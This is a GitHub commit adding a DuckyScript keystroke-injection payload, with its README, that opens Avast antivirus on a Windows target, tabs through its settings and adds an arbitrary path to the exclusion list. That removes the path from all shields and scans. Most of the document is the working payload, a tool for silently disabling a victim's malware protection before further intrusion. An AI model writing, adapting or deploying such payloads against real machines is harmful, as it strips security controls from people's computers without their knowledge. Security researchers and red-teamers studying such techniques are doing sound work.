Merge pull request #324 from aleff-github/patch-45

Add An Exception To Avast Antivirus
pull/361/merge
Darren Kitchen 2023-06-09 19:38:33 -05:00 committed by GitHub
commit 97538b351a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 118 additions and 0 deletions

View File

@ -0,0 +1,24 @@
# Add An Excepiton To Avast Antivirus
This script can be used to put an arbitrary exception path in the Avast app.
**Category**: Execute
## Description
This script can be used to put an arbitrary exception path in the Avast app.
The script open the Avast app, then go to menu, then go to, avast settings, then go to exception menu, then click the add exception button, then write the full-path defined before and save it, then close the app.
Choosing a specific file, folder, or website will exclude it from all Avast shields and scans, so be very careful when using this payload because it can concretely cause damage to your machine.
- You must edit the FULL-PATH with the path that you want to set as exception in the payload.txt file
```DuckyScript
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
```
### Dependencies
* The target must have **Avast installed** and **configured** on the machine

View File

@ -0,0 +1,94 @@
REM ########################################################
REM # |
REM # Title : Add An Exception To Avast Antivirus |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM Requirements:
REM - Avast installed and configured
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
REM Open Avast application
DELAY 2000
GUI
DELAY 1000
STRING avast
DELAY 1000
ENTER
REM Go to Avast menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
REM Go to Avast settings
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
REM Go to Exceptions menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
REM Add Exception button
DELAY 500
TAB
DELAY 500
ENTER
REM Write the full-path and then close the Avast app
DELAY 1000
TAB
DELAY 500
STRING FULL-PATH
DELAY 500
TAB
DELAY 500
ENTER
DELAY 1000
ALT F4